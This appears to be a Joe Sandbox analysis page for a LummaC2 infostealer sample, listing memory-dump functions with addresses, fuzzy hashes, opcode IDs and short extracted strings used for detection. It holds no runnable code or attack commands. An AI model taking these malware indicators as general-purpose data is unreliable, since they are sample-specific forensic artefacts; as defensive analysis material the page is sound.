Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 9c354a0b0bdc00692ee616a5470ace1ee21744b16a9a34d688d9e9c0e660c465
Instruction ID: 01b21cd088a072b9f7e49be244d7c872b1a6f0a08263db26d29920682edf11a6
Opcode Fuzzy Hash: 9c354a0b0bdc00692ee616a5470ace1ee21744b16a9a34d688d9e9c0e660c465
Instruction Fuzzy Hash: 9661E0B1A4C3508BD710DF25D851A6BB7F1EFA2308F18896DE8848B391E739D906C75B

Function 0046D189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

[U, xrefs: 0046D210
_8Y, xrefs: 0046D208

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: bea2fea333ddb91dbb49cf44bd7bdff161c0da92c9185d8b441a71339b55ffaa
Instruction ID: 8c8e03d7fb1ceb9259fe4a795ba112d7a4b21fe1eb2dab5c36357bc286ace05d
Opcode Fuzzy Hash: bea2fea333ddb91dbb49cf44bd7bdff161c0da92c9185d8b441a71339b55ffaa
Instruction Fuzzy Hash: 415102B0A4C3108BD710DF25D851A6BB7F1EFA2308F18896DE8858B395E739C906C75B

Function 0045F2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

J, xrefs: 0045F424
], xrefs: 0045F3BF

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: 7ac22bb79af100af0404c338f98604c796b99caf5015be17f45c20e7369186f8
Instruction ID: f70d897e8ad0d72bc79b995925622ba13632380e528c967fa3e62eda1ec21435
Opcode Fuzzy Hash: 7ac22bb79af100af0404c338f98604c796b99caf5015be17f45c20e7369186f8
Instruction Fuzzy Hash: 4461F773A1C7508BD3248A79888129FBBD29BD6324F194A3FDCE4D73D2D578880A8747

Function 00473C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

b"}, xrefs: 00473CED
Z[, xrefs: 00473CE6

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: cd7a0b7b4f8f230aeb1cf4e61e43658543ae0afa7c9eed77ac70801a7cdd46db
Instruction ID: b497e97493c0966fc75d517d7655fd7a0fb864b48e99453d737b3e298d43c169
Opcode Fuzzy Hash: cd7a0b7b4f8f230aeb1cf4e61e43658543ae0afa7c9eed77ac70801a7cdd46db
Instruction Fuzzy Hash: 24611376A483009FE314CF69D88075FBAE2EBC5704F09C93DE9985B381C7B488058B97

Function 00469820 Relevance: 2.7, Strings: 1, Instructions: 1444COMMON

Download Yara Rule

Strings

gd, xrefs: 00469BE3

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gd
API String ID: 2994545307-565856990
Opcode ID: f926af1deb6ecef65cf6cbd8d97ba4ec7a098d22c3f314ae3aea841c116abddf
Instruction ID: 87deabe491699026fd810f71794c15ab3d220f0553d36b899241fd054780f4c3
Opcode Fuzzy Hash: f926af1deb6ecef65cf6cbd8d97ba4ec7a098d22c3f314ae3aea841c116abddf
Instruction Fuzzy Hash: CB9223716087419BE728CF25D88172BBBE2EBD5304F18883EE48697352E679DC45CB4B

Function 0045E465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

{L, xrefs: 0045E4BD
c, xrefs: 0045E46F

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: 030a7fbc7c773e87869bf088780de051dfe513153ad29fd8d67fc8b6174f602c
Instruction ID: b0ea3e57bcf81017648b059f0f83a0f7c80dd5cab092db84dd60c1cdaa1d76c2
Opcode Fuzzy Hash: 030a7fbc7c773e87869bf088780de051dfe513153ad29fd8d67fc8b6174f602c
Instruction Fuzzy Hash: DE512172A0C3D04BD728CF24C8513DF7BE2ABE5309F18493DC8C997292E6755A068746

Function 004790B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

dV3T, xrefs: 004790DA
5B3@, xrefs: 004790C2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: 562d6238ee92a5a1a60dfc942aeb558a9ab166d2664b70fc7747c82e1873cdf6
Instruction ID: 4f85fcf384fba4bec1144a0fadbd4f3833471e1c20e667a38bbfc4e37cb9997a
Opcode Fuzzy Hash: 562d6238ee92a5a1a60dfc942aeb558a9ab166d2664b70fc7747c82e1873cdf6
Instruction Fuzzy Hash: F031CDB15083948FD3118F6A884075FFBF6FBD6704F149A2CE5D59B295C7B4C5028B0A

Function 00464A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00465160

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 945f9a0e36645fa839eccfd701a30c2c06268be106ce3ec9c2542e3995314171
Instruction ID: 7d96f7d26dd76da53c5cf7070e99774bbe280d89a731131e9e4303bbfa052e34
Opcode Fuzzy Hash: 945f9a0e36645fa839eccfd701a30c2c06268be106ce3ec9c2542e3995314171
Instruction Fuzzy Hash: 30626775A08300DFD7149F28E89273BB3A1FBA6315F14483EE88657391E7399D01CB8A

Function 0046F700 Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

2G, xrefs: 0046F711

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 2G
API String ID: 0-3788801942
Opcode ID: 62a3874f2af8ae6e314ee23b08dbeb1f43eb543b00af1c14e26abbc5f198d197
Instruction ID: 3a01232534d2412284269355ee232e41f173e52ec29b704bc73de9744dae8779
Opcode Fuzzy Hash: 62a3874f2af8ae6e314ee23b08dbeb1f43eb543b00af1c14e26abbc5f198d197
Instruction Fuzzy Hash: 09525BB0619B818ED325CB3C8815797BFD5AB5A324F084A9DE0EF873D2C7756005CB6A

Function 004766C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 004767D6

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: 0626e53e0fca631da3dfc75948958e8ebcaa973aca836931701b39619bc0033a
Instruction ID: 1a30b52ef17878f7abea0df4c6658823a964006701d92186643a62a694d4db4d
Opcode Fuzzy Hash: 0626e53e0fca631da3dfc75948958e8ebcaa973aca836931701b39619bc0033a
Instruction Fuzzy Hash: 05F187B15087418FD314DF28985126BBBE2EFC6314F19897EE5D98B382D738D806CB96

Function 0047A3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 0047A6C1

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction ID: a40bb4c5f4865f0cdff437fe1dcbfe8cae8c57c59c92c50bf63eff3385952f38
Opcode Fuzzy Hash: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction Fuzzy Hash: 76F1F4B1A083415FC728CE29C451AAFBBE5AFC5304F19C96EE89D87382D638DC158797

Function 00477A40 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

2zG, xrefs: 00477A26

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 2zG
API String ID: 0-3855003043
Opcode ID: bff9224f20a6ccb6510d5f8287a62309d4363434d2be7083960710cf576a2923
Instruction ID: 28da947d1824d382c7d2de2c170b7d7cb4cebb19d6552ca380e8f4acb6ff5e4b
Opcode Fuzzy Hash: bff9224f20a6ccb6510d5f8287a62309d4363434d2be7083960710cf576a2923
Instruction Fuzzy Hash: 7DB12632A04641CFD7158F28D8A07ADB7B3AF9A324F2982BED5559B3E1CB359D01C748

Function 00455E30 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00455F66

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction ID: d746bc270cad94ad374806161e995c613f1cec7427064ae174fe2d7f5ae6ab1d
Opcode Fuzzy Hash: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction Fuzzy Hash: 0BB127711097819FD321CF18C89061BFBE0AFA9704F444A2EE5D997782D635EA18CBA7

Function 004868A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 004868AF

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 7a83bb3a797882dae596e743d647dfb6344d522baec691ee3bff13a26ac75823
Instruction ID: c7a0f086890d98a8d45950906f5389c785dccb71736b423c7e7bb71460f06897
Opcode Fuzzy Hash: 7a83bb3a797882dae596e743d647dfb6344d522baec691ee3bff13a26ac75823
Instruction Fuzzy Hash: 58A1377110C7948FC354AB38848026FBFD29BD6328F198E2EE0D5873D2D679894AC74B

Function 0046DC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 0046DDA6

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 088abf796b12478d60e270e1a7eb0d877b4d4f93e56d881d5d14c46d1131e313
Instruction ID: a841d4c684b82c4cd5a378d9f0a908fd6d34be95228d5076b6565e7d663c9dd3
Opcode Fuzzy Hash: 088abf796b12478d60e270e1a7eb0d877b4d4f93e56d881d5d14c46d1131e313
Instruction Fuzzy Hash: B171C623F499914BD728893C8C2136A7E934BE6330F2DC77FE5B68B3E5E55948068346

Function 0047FEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 0047FFF9

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: a3b122530920a47764a2dcef10f672d0db1455a59e80581aacefae85eff8f196
Instruction ID: 445bafa06614325c9cf9f33628553ae02ef44d54b0589ceafa9b0431448f8f92
Opcode Fuzzy Hash: a3b122530920a47764a2dcef10f672d0db1455a59e80581aacefae85eff8f196
Instruction Fuzzy Hash: 3A7138236599D147D329993C4C653BA7A930BA3330F2DC77FE5F58B3E1D52948098349

Function 0046A800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 0046A8EC

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 1b02ce0ea2bae992e4cd0fc9d5f6d596943ae45a54a3b84ead710c1c9cfcb8b2
Instruction ID: bed09ddcf893d66bb8619de68422477852a2c9d6f2010cbb275a5bba1ca7c752
Opcode Fuzzy Hash: 1b02ce0ea2bae992e4cd0fc9d5f6d596943ae45a54a3b84ead710c1c9cfcb8b2
Instruction Fuzzy Hash: E661095560429109EB2CDF74849233BBAF69F5530CB1891FFC965CFAA7E938C107878A

Function 0048B813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 0048B9E3

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 3549b3fb73dba623dd4467e975b5d384f05dcb7e42c04a7a424bb9aff7dcad91
Instruction ID: 8c6658398950792dff32d310343426938d8955462275113ef0997286c364b3c7
Opcode Fuzzy Hash: 3549b3fb73dba623dd4467e975b5d384f05dcb7e42c04a7a424bb9aff7dcad91
Instruction Fuzzy Hash: 92514971610A118BCB1CDF79DD6157EBBE2FB56304318497EC452DB3A2EB399802CB58

Function 0046AAE0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

2wF, xrefs: 0046AAF0

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 2wF
API String ID: 0-661644152
Opcode ID: 69914a2c630aa2193bcbd2db211c0183473c1fd3a9de772efce8450d80d62694
Instruction ID: 6b8187338ad2874e6eaa9bc041726712ce5a815fb2b87533088b18b7946b90bb
Opcode Fuzzy Hash: 69914a2c630aa2193bcbd2db211c0183473c1fd3a9de772efce8450d80d62694
Instruction Fuzzy Hash: 3C512533B49D914BE338893C4C203A66A934BE3330B2DC37BD5B2973E5E5694812974B

Function 0048E8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 0048E9AB

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4615c539beccfc880242024b7bd94cdcff3d96fc4c0d6a44f138d5510dc29738
Instruction ID: fe75eb8417085733a3902aada27dac2f6636b94164b837ca5a25f884be6fc3d2
Opcode Fuzzy Hash: 4615c539beccfc880242024b7bd94cdcff3d96fc4c0d6a44f138d5510dc29738
Instruction Fuzzy Hash: 494122B26043109BD718DF15CC91B7BB7A2FFD5318F08892DE5854B3A1E779A904CB86

Function 0048DAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 0048DAF0

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 1830f3873ffcd3bafffc2b95066496df5d6b7a6a99c93f4191fa5dac5125133c
Instruction ID: 8d97e2b3984e749c17b9753968a78b9569e808b057bf16b991c7f5393868c04d
Opcode Fuzzy Hash: 1830f3873ffcd3bafffc2b95066496df5d6b7a6a99c93f4191fa5dac5125133c
Instruction Fuzzy Hash: 1B21DDB150A3049FD310EF18D8C0A6BB7F6FBCA328F15892DE58983290D335A944CB96

Function 00478290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 00478360

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 3127f040d7b861b4559c9ed9b8118751c5281e6d16d69443ead3d0d6adbe601d
Instruction ID: e39a4196955113f937eecd877708ef50274f8ef7a0263f54824efc97749979fa
Opcode Fuzzy Hash: 3127f040d7b861b4559c9ed9b8118751c5281e6d16d69443ead3d0d6adbe601d
